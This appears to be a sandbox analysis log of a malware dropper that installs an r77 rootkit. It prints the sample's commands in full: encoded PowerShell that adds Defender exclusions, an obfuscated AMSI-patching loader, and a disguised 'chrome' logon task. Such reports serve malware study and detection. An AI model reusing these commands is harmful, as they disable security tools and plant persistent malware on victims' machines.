Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E010 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\34432.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmpJump to behavior
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004021AA CoCreateInstance,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\AppData\Roaming\34432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Install.exeStatic file information: File size 4713759 > 1048576
Source: Install.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
